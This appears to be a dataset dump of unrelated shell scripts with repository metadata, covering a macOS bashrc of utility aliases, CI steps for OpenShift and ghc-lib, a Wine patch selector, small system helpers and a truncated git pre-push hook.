# find /System/Library -name Localizable.strings -print0 | xargs -0 perl -n -e 'use Encode; $_ = decode("utf16be", $_); print if /compromised/
# but note that it might be better to use 'iconv'
# example of using the -J option to xargs to specify a placeholder:
# find . -name "*.java" -print0 | xargs -0 -J % cp % destinationFolder
# findword: search for a word in the Unix word list
function findword () { /usr/bin/grep ^"$@"$ /usr/share/dict/words ; }
# dict: lookup a word with Dictionary.app
function dict () { open dict:///"$@" ; }
#---------------
# Text handling:
#---------------
# fixlines: edit files in place to ensure Unix line-endings
function fixlines () { /usr/bin/perl -pi~ -e 's/\r\n?/\n/g' "$@" ; }
# cut80: truncate lines longer than 80 characters (for use in pipes)
alias cut80='/usr/bin/cut -c 1-80'
# foldpb: make text in clipboard wrap so as to not exceed 80 characters
alias foldpb='pbpaste | fold -s | pbcopy'
# enquote: surround lines with quotes (useful in pipes) - from mervTormel
function enquote () { /usr/bin/sed 's/^/"/;s/$/"/' ; }
# casepat: generate a case-insensitive pattern
function casepat () { perl -pe 's/([a-zA-Z])/sprintf("[%s%s]",uc($1),$1)/ge' ; }
# getcolumn: extract a particular column of space-separated output
# e.g.: lsof | getcolumn 0 | sort | uniq
function getcolumn () { perl -ne '@cols = split; print "$cols['$1']\n"' ; }
# cat_pdfs: concatenate PDF files
# e.g. cat_pdfs -o combined.pdf file1.pdf file2.pdf file3.pdf
function cat_pdfs () { python '/System/Library/Automator/Combine PDF Pages.action/Contents/Resources/join.py' "$@" ; }
# numberLines: echo the lines of a file preceded by line number
function numberLines () { perl -pe 's/^/$. /' "$@" ; }
# convertHex: convert hexadecimal numbers to decimal
function convertHex () { perl -ne 'print hex(), "\n"' ; }
# allStrings: show all strings (ASCII & Unicode) in a file
function allStrings () { cat "$1" | tr -d "\0" | strings ; }
# /usr/bin/iconv & /sw/sbin/iconv convert one character encoding to another
# to convert text to HTML and vice vera, use 'textutil'
# to convert a man page to PDF: man -t foo > foo.ps; open foo.ps; save as PDF
#------------
# Processes:
#------------
alias pstree='/sw/bin/pstree -g 2 -w'
# findPid: find out the pid of a specified process
# Note that the command name can be specified via a regex
# E.g. findPid '/d$/' finds pids of all processes with names ending in 'd'
# Without the 'sudo' it will only find processes of the current user
function findPid () { sudo /usr/sbin/lsof -t -c "$@" ; }
# to find memory hogs:
alias mem_hogs_top='top -l 1 -o rsize -n 10'
alias mem_hogs_ps='ps wwaxm -o pid,stat,vsize,rss,time,command | head -10'
# to find CPU hogs
alias cpu_hogs='ps wwaxr -o pid,stat,%cpu,time,command | head -10'
# continual 'top' listing (every 10 seconds) showing top 15 CPU consumers
alias topforever='top -l 0 -s 10 -o cpu -n 15'
# recommended 'top' invocation to minimize resources in thie macosxhints article
# http://www.macosxhints.com/article.php?story=20060816123853639
# exec /usr/bin/top -R -F -s 10 -o rsize
# diskwho: to show processes reading/writing to disk
alias diskwho='sudo iotop'
#------------
# Networking:
#------------
# lsock: to display open sockets (the -P option to lsof disables port names)
alias lsock='sudo /usr/sbin/lsof -i -P'
# airportMtu: set the MTU on Airport to be a value that makes SMTP to DSL work
# (I determined the value empirically by using 'ping -s' to the SMTP server)
alias airportMtu='sudo ifconfig en1 mtu 1364'
# airport: Apple's command-line tool. For status info, use -I, for help use -h
# See: http://www.macosxhints.com/article.php?story=20050715001815547
alias airport='/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport'
# Note also the tool that I compiled: airport_info (in my Tools dir)
# ip_info: to get info on DHCP server, router, DNS server, etc (for en0 or en1)
alias ip_info='ipconfig getpacket en1'
# browse_bonjour: browse services advertised via Bonjour
# Note: need to supply a "type" argument- e.g. "_http._tcp"
# See http://www.dns-sd.org/ServiceTypes.html for more types
# Optionally supply a "domain" argument
alias browse_bonjour='dns-sd -B'
# hostname_lookup: interactive debugging mode for lookupd (use tab-completion)
alias hostname_lookup='lookupd -d'
# debug_http: download a web page and show info on what took time
function debug_http () { /usr/bin/curl $@ -o /dev/null -w "dns: %{time_namelookup} connect: %{time_connect} pretransfer: %{time_pretransfer} starttransfer: %{time_starttransfer} total: %{time_total}\n" ; }
# http_headers: get just the HTTP headers from a web page (and its redirects)
function http_headers () { /usr/bin/curl -I -L $@ ; }
# Note: 'active_net_iface' is my script that echos the active net interface
# pkt_trace: for use in the following aliases
alias pkt_trace='sudo tcpflow -i `active_net_iface` -c'
# smtp_trace: to show all SMTP packets
alias smtp_trace='pkt_trace port smtp'
# http_trace: to show all HTTP packets
alias http_trace='pkt_trace port 80'
# tcp_trace: to show all TCP packets
alias tcp_trace='pkt_trace tcp'
# udp_trace: to show all UDP packets
alias udp_trace='pkt_trace udp'
# ip_trace: to show all IP packets
alias ip_trace='pkt_trace ip'
# can use 'scselect' to find out current network "location"
# can use 'scutil' for other system config stuff
# to do socket programming in bash, redirect to /dev/tcp/$host/$port
# Example:
# osaClient: send the contents of file $1 to a service on localhost:4321
# through bash's /dev/tcp, terminate with an "-- end of file" marker line,
# then print the server's response.
# NOTE(review): assumes the server stops sending (or closes) after the
# marker; otherwise the final `cat` blocks -- confirm the server protocol.
function osaClient ()
{
exec 5<> /dev/tcp/localhost/4321
cat $1 >&5
echo "-- end of file" >&5
cat <&5
exec 5>&-
}
#------
# Misc:
#------
# epochtime: report number of seconds since the Epoch
alias epochtime='date +%s'
# screensaverdesktop: run a screensaver on the Desktop
alias screensaverdesktop='/System/Library/Frameworks/ScreenSaver.framework/Resources/ScreenSaverEngine.app/Contents/MacOS/ScreenSaverEngine -background'
# consoleapp: launch the Console app from Terminal
alias consoleapp='/Applications/Utilities/Console.app/Contents/MacOS/Console &'
#---------------------------
# System operations & info:
#---------------------------
# repairpermissions
alias repairpermissions='sudo diskutil repairpermissions /'
# install all software updates from the command line
alias software_update_cmd='COMMAND_LINE_INSTALL=1 export COMMAND_LINE_INSTALL; sudo softwareupdate -i -a'
# third_party_kexts: to check for non-Apple kernel extensions
alias third_party_kexts='kextstat | grep -v com.apple'
# show_optical_disk_info - e.g. what type of CD & DVD media is supported
alias show_optical_disk_info='drutil info'
# remove_disk: spin down unneeded disk
# diskutil eject /dev/disk1s3
alias nd0='diskutil eject /dev/disk0s3'
alias nd1='diskutil eject /dev/disk1s3'
# mount_read_write: for use when booted into single-user
alias mount_read_write='/sbin/mount -uw /'
# herr: shows the most recent lines from the HTTP error log
alias herr='tail /var/log/httpd/error_log'
# use vsdbutil to show/change the permissions ignoring on external drives
# To ignore ownerships on a volume, do: sudo vsdbutil -d /VolumeName
# To restore ownerships on a volume, do: sudo vsdbutil -a /VolumeName
# To check the status of ownerships, do: sudo vsdbutil -c /VolumeName
alias ignore_permissions='sudo vsdbutil -d'
# to change the password on anencrypted disk image:
# hdiutil chpass /path/to/the/diskimage
# netparams: to show values of network parameters in the kernel
alias netparams='sysctl -a | grep net'
# swapinfo: to display info on swap
alias swapinfo='sysctl vm.swapusage'
# get info about system via AppleScript
# Note: this is rather slow - it is faster to run 'system_profiler'
# Note: to get computer name use: computer name of (system info)
function applescript_info ()
{
info=$( /usr/bin/osascript <<" EOT"
system info
EOT
)
echo $info
}
# to mount a read-only disk image as read-write:
# hdiutil attach example.dmg -shadow /tmp/example.shadow -noverify
# mounting a removable drive (of type msdos or hfs)
# mkdir /Volumes/Foo
# ls /dev/disk* to find out the device to use in the mount command)
# mount -t msdos /dev/disk1s1 /Volumes/Foo
# mount -t hfs /dev/disk1s1 /Volumes/Foo
# to create a file of a given size: /usr/sbin/mkfile or /usr/bin/hdiutil
# e.g.: mkfile 10m 10MB.dat
# e.g.: hdiutil create -size 10m 10MB.dmg
# the above create files that are almost all zeros - if random bytes are desired
# then use: ~/Dev/Perl/randBytes 1048576 > 10MB.dat
# making a hard-link backup of a directory
# rsync -a --delete --link-dest=$DIR $DIR /backup/path/for/dir
# starting AFP file sharing
alias startFileSharing='sudo /usr/sbin/AppleFileServer'
# hidden command line utilities: networksetup & systemsetup
alias networksetup='/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/networksetup'
alias systemsetup='/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup'
alias ardkickstart='/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart'
#--------
# Finder:
#---------
# show hidden files in Finder
alias finderShowHidden='defaults write com.apple.finder ShowAllFiles TRUE'
alias finderHideHidden='defaults write com.apple.finder ShowAllFiles FALSE'
# finderTurnOffDesktop: turn off display of files on the Desktop
alias finderTurnOffDesktop='defaults write com.apple.finder CreateDesktop FALSE'
# to stop Finder writing .DS_Store files on network volumes
# defaults write com.apple.desktopservices DSDontWriteNetworkStores true
# lsregister: utility for looking at the Launch Services database
# e.g. 'lsregister -dump' to display database contents
# use 'lsregister -h' to get usage info
alias lsregister='/System/Library/Frameworks/ApplicationServices.framework/Frameworks/LaunchServices.framework/Support/lsregister'
# disable and re-enable Dashboard Widgets
alias disableDashboard='defaults write com.apple.dashboard mcx-disabled -bool YES; killall Dock'
alias enableDashboard='defaults delete com.apple.dashboard mcx-disabled; killAll Dock'
# ql: show a "Quick Look" view of files
function ql () { /usr/bin/qlmanage -p "$@" >& /dev/null & }
# locateql: search using Spotlight and show a "Quick Look" of matching files
function locateql ()
{
locatemd "$@" | enquote | xargs qlmanage -p >& /dev/null &
}
alias cdf='eval `osascript /Applications/OpenTerminal.app/Contents/Resources/Scripts/OpenTerminal.scpt `'
alias scppasswd="scp -o PreferredAuthentications=password -o PubkeyAuthentication=no"
alias sshpasswd="ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no"
#--------
# Safari:
#--------
# cleanup_favicons: clean up Safari favicons
alias cleanup_favicons='find $HOME/Library/Safari/Icons -type f -atime +30 -name "*.cache" -print -delete'
#-----------------
# Misc Reminders:
#-----------------
# To find idle time: look for HIDIdleTime in output of 'ioreg -c IOHIDSystem'
# to set the delay for drag & drop of text (integer number of milliseconds)
# defaults write -g NSDragAndDropTextDelay -int 100
# URL for a man page (example): x-man-page://3/malloc
# to read a single key press:
alias keypress='read -s -n1 keypress; echo $keypress'
# to compile an AppleScript file to a resource-fork in the source file:
function osacompile_rsrc () { osacompile -x -r scpt:128 -o $1 $1; }
# alternative to the use of 'basename' for usage statements: ${0##*/}
# graphical operations, image manipulation: sips
# numerical user id: 'id -u'
# e.g.: ls -l /private/var/tmp/mds/$(id -u)
####################################
# History Settings
####################################
shopt -s histappend # Make Bash append rather than overwrite the history on disk
PROMPT_COMMAND='history -a' # Whenever displaying the prompt, write the previous line to disk
export HISTSIZE=3000
export HISTFILESIZE=3000
# don't put duplicate lines in the history. See bash(1) for more options
export HISTCONTROL=ignoredups
# ... and ignore same sucessive entries.
export HISTCONTROL=ignoreboth
# MacPorts Installer addition on 2009-12-06_at_19:25:13: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.
#RVM!
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"
for f in ~/.bash.d/*; do source $f; done
| true
|
6116b1c4fcf270a5bf55bb243ebb058441ae825c
|
Shell
|
CGuichardMasterDL/MCS_DTW
|
/scripts/test.sh
|
UTF-8
| 726
| 3.625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Run the project's test-suite with nose under python3, using ./venv when
# present, and recreate the out/tests output directory on each run.
# User-facing messages are intentionally in French.
if [ ! -d "venv" ]
then
echo "[Pas de virtualenv trouvé. Utilisation du python3 par défaut]"
else
echo "[Utilisation du virtualenv]"
source "venv/bin/activate"
fi

printf "\033[0;36m#====== TEST =====#\033[0m\n\n"

# Sanity checks: test1 counts the "usage:" line of `python3 --help`
# (1 when python3 runs); test2 is non-empty when the nose module loads.
test1=$(python3 --help 2>/dev/null | grep -c "usage:")
test2=$(python3 -mnose --help 2> /dev/null)

if [ "$test1" -eq 1 ] && [ -n "$test2" ]; then
mkdir -p out
mkdir -p out/tests
rm -rf out/tests/*
python3 -m nose tests
rm -f tests/*.pyc
printf "\n\033[0;32m#====== DONE =====#\033[0m\n"
else
printf "\033[1;31mErreur\033[0m: Veuillez installer les paquets nécessaires (voir le README.md).\n"
printf "\n\033[0;31m#====== FAILED =====#\033[0m\n"
fi
| true
|
081d9ef763ea02813a996682dc0ed4d943606817
|
Shell
|
openshift/release
|
/ci-operator/step-registry/ipi/conf/gcp/oidc-creds-additional/ipi-conf-gcp-oidc-creds-additional-commands.sh
|
UTF-8
| 1,733
| 3.59375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash

set -o nounset
set -o errexit
set -o pipefail

# Mint a long-lived GCP service-account key for the image-registry operator
# and splice it, base64-encoded, into the pre-generated credentials manifest
# under data["service_account.json"].

image_registry_credential_yaml="${SHARED_DIR}/manifest_openshift-image-registry-installer-cloud-credentials-credentials.yaml"
if [[ ! -f "${image_registry_credential_yaml}" ]]; then
  echo "'${image_registry_credential_yaml}' not found, abort." && exit 1
fi

PROJECT_NAME=$(< "${CLUSTER_PROFILE_DIR}/openshift_gcp_project")
export GOOGLE_CLOUD_KEYFILE_JSON="${CLUSTER_PROFILE_DIR}/gce.json"
sa_email=$(jq -r .client_email "${GOOGLE_CLOUD_KEYFILE_JSON}")
# Activate the service account only when it is not already the active identity.
if ! gcloud auth list | grep -E "\*\s+${sa_email}"
then
  gcloud auth activate-service-account --key-file="${GOOGLE_CLOUD_KEYFILE_JSON}"
  gcloud config set project "${PROJECT_NAME}"
fi

infra_name=${NAMESPACE}-${UNIQUE_HASH}
working_dir=$(mktemp -d)   # $(...) replaces legacy backticks
pushd "${working_dir}"

echo -e "\n$(date -u --rfc-3339=seconds) - Creating long-live key for image-registry (https://docs.openshift.com/container-platform/4.10/authentication/managing_cloud_provider_credentials/cco-mode-gcp-workload-identity.html#cco-ccoctl-gcp-image-registry_cco-mode-gcp-workload-identity)"
image_registry_sa=$(gcloud iam service-accounts list --filter="displayName=${infra_name}-openshift-image-registry-gcs" --format=json | jq -r '.[].email')
new_key_json="image_registry_key.json"
gcloud iam service-accounts keys create "${new_key_json}" --iam-account="${image_registry_sa}"
# Encode the key and patch it into the manifest. Input redirections replace
# the former "cat file | cmd" pipelines (useless use of cat).
new_key_str_b64=$(base64 -w 0 < "${new_key_json}")
yq-go r -j "${image_registry_credential_yaml}" > tmp1.json
jq --arg k "${new_key_str_b64}" '.data["service_account.json"] = $k' < tmp1.json > tmp2.json
yq-go r -P - < tmp2.json > "${image_registry_credential_yaml}"
popd

echo -e "\n$(date -u --rfc-3339=seconds) - Updated image-registry SA with long-live key."
| true
|
588cb873ffe6672f5c1409fa986d462a0ca3d07a
|
Shell
|
ndarapaneni/scripts
|
/linux-scripts/freememory.sh
|
UTF-8
| 345
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Report what percentage of total RAM is still free and warn below 30%.
# Parse `free` in its default kibibyte units instead of -g: -g truncates to
# whole GiB, so a host with <1 GiB free reported 0% and a host with <1 GiB
# total crashed on division by zero. NR==2 is the "Mem:" line, where $2 is
# total and $4 is free (same fields the old head/tail pipelines selected).
p=$(free | awk 'NR==2 { if ($2 > 0) printf "%d", 100 * $4 / $2; else print 0 }')
echo "Percentage of Memory available is: $p% "
if [ "$p" -lt 30 ];
then
echo "you are running on low memory:: you have only $p%"
else
echo "you are good, you have $p% memory"
fi
| true
|
15b0901d3f0597a74fca146dff60eb00ffbdfee7
|
Shell
|
Frogging-Family/wine-tkg-git
|
/wine-tkg-git/wine-tkg-patches/proton/proton-winevulkan/proton-winevulkan
|
UTF-8
| 3,533
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash

# Apply the Proton winevulkan patchset variant matching both the wine
# tree's position in upstream history and the fullscreen-hack setting
# (_proton_fs_hack). Only runs when _update_winevulkan is enabled and the
# tree sits inside the supported commit window. nonuser_patcher (defined
# elsewhere) applies $_patchname and reports $_patchmsg.
if [ "$_update_winevulkan" = "true" ] && git merge-base --is-ancestor 7e736b5903d3d078bbf7bb6a509536a942f6b9a0 HEAD && ! git merge-base --is-ancestor 656edbb508d51cbe3155d856ee3f2c27a6cd4cba HEAD && ( ! git merge-base --is-ancestor 0f972e2247932f255f131792724e4796b4b2b87a HEAD || git merge-base --is-ancestor 21e002aa7e7f85d92d1efeaeb7a9545eb16b96ad HEAD && [ "$_proton_fs_hack" = "true" ] ); then
# Tree new enough for the tip patches: pick the fshack/nofshack flavour.
if git merge-base --is-ancestor 221995a6838da5be2217735c3b1e1b1cd8f01e9f HEAD; then
if [ "$_proton_fs_hack" = "true" ]; then
_patchname='proton-winevulkan.patch' && _patchmsg="Using Proton winevulkan patches" && nonuser_patcher
else
_patchname='proton-winevulkan-nofshack.patch' && _patchmsg="Using Proton winevulkan patches (nofshack)" && nonuser_patcher
fi
else
# Older tree: walk known upstream commits newest-first and remember the
# short hash naming the newest patch revision applicable to this tree.
if git merge-base --is-ancestor 8285f616030f27877922ff414530d4f909306ace HEAD; then
_lastcommit="221995a"
elif git merge-base --is-ancestor 9561af9a7d8d77e2f98341e278c842226cae47ed HEAD; then
_lastcommit="8285f61"
elif git merge-base --is-ancestor 88da78ef428317ff8c258277511abebf1a75e186 HEAD; then
_lastcommit="9561af9"
elif git merge-base --is-ancestor c681a0732fc3c6466b228417bb5e0d518d26b819 HEAD; then
_lastcommit="88da78e"
elif git merge-base --is-ancestor eb9f3dd3ad07aae3c9588bcff376ed2a7a8ef8d2 HEAD; then
_lastcommit="c681a07"
elif git merge-base --is-ancestor 7d8c50e4371f2fc5300b90b323210c922d80d4e9 HEAD; then
_lastcommit="eb9f3dd"
elif git merge-base --is-ancestor fc893489fe89c9fbd22f0cbe1c4327c64f05e0dc HEAD; then
_lastcommit="7d8c50e"
elif git merge-base --is-ancestor bff6bc6a79ffc3a915219a6dfe64c9bcabaaeceb HEAD; then
_lastcommit="fc89348"
elif git merge-base --is-ancestor 1e074c39f635c585595e9f3ece99aa290a7f9cf8 HEAD; then
_lastcommit="bff6bc6"
elif git merge-base --is-ancestor 8bd62231c3ab222c07063cb340e26c3c76ff4229 HEAD; then
_lastcommit="1e074c3"
elif git merge-base --is-ancestor 380b7f28253c048d04c1fbd0cfbc7e804bb1b0e1 HEAD; then
_lastcommit="8bd6223"
elif git merge-base --is-ancestor 408a5a86ec30e293bf9e6eec4890d552073a82e8 HEAD; then
_lastcommit="380b7f2"
elif git merge-base --is-ancestor d2f552d1508dbabb595eae23db9e5c157eaf9b41 HEAD; then
_lastcommit="408a5a8"
elif git merge-base --is-ancestor 594814c00ab059d9686ed836b1865f8a94859c8a HEAD; then
_lastcommit="d2f552d"
elif git merge-base --is-ancestor 086c686e817a596e35c41dd5b37f3c28587af9d5 HEAD; then
_lastcommit="594814c"
elif git merge-base --is-ancestor bdeae71bc129ac83c44753672d110b06a480c93c HEAD; then
_lastcommit="086c686"
elif git merge-base --is-ancestor 7b1622d1ab90f01fdb3a2bc24e12ab4990f07f68 HEAD; then
_lastcommit="bdeae71"
#elif git merge-base --is-ancestor 7e736b5903d3d078bbf7bb6a509536a942f6b9a0 HEAD; then
# _lastcommit="7b1622d"
else
_lastcommit="none"
fi
# Apply the pinned revision (if any match was found), fshack or nofshack.
if [ "$_lastcommit" != "none" ]; then
if [ "$_proton_fs_hack" = "true" ]; then
_patchname="proton-winevulkan-$_lastcommit.patch" && _patchmsg="Using Proton winevulkan patches" && nonuser_patcher
else
_patchname="proton-winevulkan-nofshack-$_lastcommit.patch" && _patchmsg="Using Proton winevulkan patches (nofshack)" && nonuser_patcher
fi
fi
fi
fi
| true
|
18a646f5728c0a3731ff765afc9112a62a5f9f53
|
Shell
|
Jeremie-C/my-dnsmasq-gen
|
/hooks/.config
|
UTF-8
| 2,502
| 3.65625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set +u

# Docker Hub autobuild hook configuration: derive the image tag / manifest
# name from the build context and discover which target architectures can
# actually be built (i.e. have a matching qemu-*-static binary present).

# Send Variables
echo "SOURCE_BRANCH: $SOURCE_BRANCH"
echo "SOURCE_COMMIT: $SOURCE_COMMIT"
echo "COMMIT_MSG: $COMMIT_MSG"
echo "DOCKER_REPO: $DOCKER_REPO"
echo "DOCKERFILE_PATH: $DOCKERFILE_PATH"
echo "CACHE_TAG: $CACHE_TAG"
echo "IMAGE_NAME: $IMAGE_NAME"
echo

# Base Variable
BUILD_DATE=$(date -u +'%Y-%m-%dT%H:%M:%Sz')
BUILD_REF=$(git rev-parse --short HEAD)
MANIF_ALL='latest'

# Expansions below are quoted: under `set +u` an unset variable expands to
# nothing, and the previous unquoted [ $VAR = 'x' ] tests then failed with
# "unary operator expected".
# Branche MASTER
if [ "${SOURCE_BRANCH}" = 'master' ]; then
  DOCKER_TAG="${BUILD_REF}"
  MANIF_ALL="${SOURCE_BRANCH}"
fi
# Autres branches avec tag dev
if [ "${DOCKER_TAG}" = 'develop' ]; then
  DOCKER_TAG="${BUILD_REF}"
  MANIF_ALL="${SOURCE_BRANCH}"
fi
# Si on entre un tag latest
if [ "${DOCKER_TAG}" = 'latest' ]; then
  DOCKER_TAG="${BUILD_REF}"
  MANIF_ALL="${SOURCE_BRANCH}"
fi
# Dans les autres cas, on prends les valeurs de DockerHub
# et on génére le manifest LATEST

# Set Image Name
IMAGE_NAME="${DOCKER_REPO}:${DOCKER_TAG}"
# DockerFile
: "${DOCKERFILE_PATH:=./Dockerfile}"

# Informations
echo "✅ Variables after applying defaults:"
echo "DOCKERFILE_PATH: $DOCKERFILE_PATH"
echo "IMAGE_NAME: $IMAGE_NAME"
echo "MANIFEST_TAG: $MANIF_ALL"
echo

# Path
export PATH="$PWD/docker:$PATH"

# => https://hub.docker.com/u/arm64v8/
declare -A base_image_prefix_map=( ["arm64v8"]="arm64v8/" ["arm32v5"]="arm32v5/" ["arm32v6"]="arm32v6/" ["arm32v7"]="arm32v7/" ["amd64"]="")
# => dpkg -L qemu-user-static | grep /usr/bin/
declare -A docker_qemu_arch_map=( ["arm64v8"]="aarch64" ["arm32v5"]="arm" ["arm32v6"]="arm" ["arm32v7"]="arm" ["amd64"]="x86_64")
# => https://github.com/docker/docker-ce/blob/76ac3a4952a9c03f04f26fc88d3160acd51d1702/components/cli/cli/command/manifest/util.go#L22
declare -A docker_to_manifest_map=( ["arm64v8"]="arm64" ["arm32v5"]="arm" ["arm32v6"]="arm" ["arm32v7"]="arm" ["amd64"]="amd64")
# => Variants
declare -A docker_to_variant_map=( ["arm64v8"]="v8" ["arm32v5"]="v5" ["arm32v6"]="v6" ["arm32v7"]="v7" ["amd64"]="")
# =>
declare -A docker_gen_binary_map=( ["arm32v6"]="armhf" ["arm32v7"]="armhf" ["arm64v8"]="arm64" ["amd64"]="amd64" )

# what we want to build
build_architectures=(amd64 arm32v6 arm32v7 arm64v8)
verified_build_architectures=()
# what we can build: keep only architectures whose qemu binary is present
for arch in "${build_architectures[@]}"; do
  if [ -f "qemu-${docker_qemu_arch_map[${arch}]}-static" ]; then
    echo "qemu binary for $arch found";
    verified_build_architectures+=("$arch")
  fi
done
# Final list (quoted [@] expansion prints every element, not just the first)
echo "${verified_build_architectures[@]}"
set -u
docker -v
echo
| true
|
ab67cc535c1e2eff57c5db9db15b4c923048ecfb
|
Shell
|
guilhermeG23/Shell_Script_Praticos
|
/permissoes.sh
|
UTF-8
| 1,173
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
# Print a human-readable breakdown of one "ls -l" entry.
#   $1 - permission string as printed by "ls -l" (e.g. "-rwxr-xr-x")
#   $2 - file name
imprimir() {
  echo =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  echo "Permissao: $1"
  echo "Arquivo: $2"
  # Character 1 encodes the entry type.
  valor=$(echo "$1" | cut -c1)
  if [ "$valor" = '-' ]; then
    echo "Tipo $valor -> Arquivo regular"
  elif [ "$valor" = 'd' ]; then
    echo "Tipo $valor -> Diretorio"
  elif [ "$valor" = 'l' ]; then
    # fix: "ls -l" marks symbolic links with 'l', not 'i'
    echo "Tipo $valor -> Link simbolico"
  fi
  # Owner bits are characters 2-4, in read/write/execute order.
  # (fix: column 2 is the READ bit and column 3 the WRITE bit; the
  # original labeled them the other way around)
  Leitura=$(echo "$1" | cut -c2)
  Escrita=$(echo "$1" | cut -c3)
  Execucao=$(echo "$1" | cut -c4)
  echo "Dono -> Leitura $Leitura | Escrita $Escrita | Execucao $Execucao"
  # Group bits: characters 5-7.
  Leitura=$(echo "$1" | cut -c5)
  Escrita=$(echo "$1" | cut -c6)
  Execucao=$(echo "$1" | cut -c7)
  echo "Grupo -> Leitura $Leitura | Escrita $Escrita | Execucao $Execucao"
  # Other bits: characters 8-10.
  Leitura=$(echo "$1" | cut -c8)
  Escrita=$(echo "$1" | cut -c9)
  Execucao=$(echo "$1" | cut -c10)
  echo "Outros -> Leitura $Leitura | Escrita $Escrita | Execucao $Execucao"
  # Character 11, when present, is the ACL/extended-attribute indicator
  # ('+' or '.') appended by GNU ls.
  # NOTE(review): the original labels this "Link"; kept for output
  # compatibility -- confirm whether callers rely on that wording.
  Link=$(echo "$1" | cut -c11)
  if [ "$Link" ]; then
    echo "Link -> $Link"
  fi
  echo =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
}
# Capture the permission string and name of every entry in the current
# directory, dropping the "total N" header line that "ls -la" prints.
ls -la | awk '{ print $1,$9 }' | sed '1d' > saida.txt
# Report each entry, skipping the temporary work file itself.
# (fix: read the two fields directly instead of spawning awk per line;
# quote the comparison so odd/empty names cannot break the test)
while read -r permissao nome; do
  if [ "$nome" != 'saida.txt' ]; then
    imprimir "$permissao" "$nome"
  fi
done < saida.txt
# Remove the temporary file (-f is enough; it is a plain file).
rm -f saida.txt
| true
|
90ac456f5c592bb21379917dafdefa3cb41567ee
|
Shell
|
troglobit/finit
|
/test/skel/bin/slay
|
UTF-8
| 862
| 3.609375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# slay - finit test helper: look up the PID finit registered for the
# service named in $1, verify the previously killed PID was deregistered,
# wait for a fresh PID to appear, record it, then SIGKILL the process.
nm=$1
# shellcheck disable=SC2046
# Extract the PID column from "initctl status <service>" output.
getpid()
{
initctl status "$1" |awk '/PID :/{ print $3; }'
}
pid=$(getpid "$nm")
# If a previous run recorded a PID, make sure finit no longer reports it;
# a matching PID means finit did not notice the old process dying.
# NOTE(review): this reads ./oldpid but the script writes /tmp/oldpid at
# the end -- presumably the harness runs with /tmp as cwd; confirm.
if [ -f oldpid ]; then
oldpid=$(cat oldpid)
if [ "$oldpid" = "$pid" ]; then
echo "Looks bad, wait for it ..."
sleep 3
pid=$(getpid "$nm")
if [ "$oldpid" = "$pid" ]; then
# Still the stale PID: dump diagnostics, force a reload, fail the test.
echo "Finit did not deregister old PID $oldpid vs $pid"
initctl status "$nm"
ps
echo "Reloading finit ..."
initctl reload
sleep 1
initctl status "$nm"
exit 1
fi
fi
fi
# Poll (50 x 0.1 s = ~5 s) until the service reports a usable PID (> 1).
timeout=50
while [ "$pid" -le 1 ]; do
sleep 0.1
pid=$(getpid "$nm")
if [ "$pid" -le 1 ]; then
timeout=$((timeout - 1))
if [ "$timeout" -gt 0 ]; then
continue
fi
# Timed out without a real PID: dump process state and fail.
echo "Got a bad PID: $pid, aborting ..."
ps
sleep 1
initctl status "$nm"
ps
exit 1
fi
break
done
# Remember which PID we are about to kill so the next invocation can
# verify that finit deregistered it.
echo "$pid" > /tmp/oldpid
#echo "PID $pid, kill -9 ..."
kill -9 "$pid"
| true
|
367b3570a7fbd03eca89daf62b35f1eb23af13bd
|
Shell
|
tyll/dracut-cryptssh
|
/89cryptssh/kill-dropbear.sh
|
UTF-8
| 225
| 3.09375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Tear down the dropbear SSH daemon started in the initramfs: freeze the
# listener so it cannot accept new sessions, kill its children, then kill
# and thaw the listener itself.
pid_file=/tmp/dropbear.pid

# No pidfile means dropbear never started -- nothing to do.
[ -e $pid_file ] || exit 0
read PID < $pid_file

# Suspend the listening process so no new sessions are forked.
kill -SIGSTOP $PID
# Terminate every child process (active sessions).
pkill -P $PID
# Terminate the listener, then resume it so the signal is delivered.
kill $PID
kill -SIGCONT $PID
| true
|
058c318e7d4ebf0cb3dd787a8c95d558afad974b
|
Shell
|
digital-asset/ghc-lib
|
/ghc-lib-stack-matrix-build-test.sh
|
UTF-8
| 425
| 2.640625
| 3
|
[
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/usr/bin/env bash
# Matrix build: exercise every ghc-lib flavor against every stack resolver.
set -euo pipefail

flavors=("ghc-master" "ghc-9.6.1")
resolvers=("ghc-9.4.4" "ghc-9.2.5" "ghc-9.2.2")

for flavor in "${flavors[@]}"; do
  for resolver in "${resolvers[@]}"; do
    echo "-- "
    # Run the CI driver once per (flavor, resolver) combination.
    stack runhaskell --stack-yaml stack-exact.yaml --resolver "$resolver" \
      --package extra --package optparse-applicative CI.hs -- \
      --ghc-flavor "$flavor" --stack-yaml stack-exact.yaml \
      --resolver "$resolver" --no-checkout
  done
done
| true
|
f31fdd86273cdcee74885bf610e78da7616b5b72
|
Shell
|
danieldbower/githooks
|
/hooks/pre-push
|
UTF-8
| 675
| 3.40625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Git pre-push hook: refuse direct pushes to protected branches
# (master, development); submit a pull request instead.
# Ideas and some code from comments to
# https://gist.github.com/pixelhandler/5718585
# (fix: removed the unused PUSH_COMMAND variable; modernized backticks)

BRANCH=$(git rev-parse --abbrev-ref HEAD)
PROTECTED_BRANCHES="^(master|development)"

RED='\033[0;31m'
NC='\033[0m' # No Color

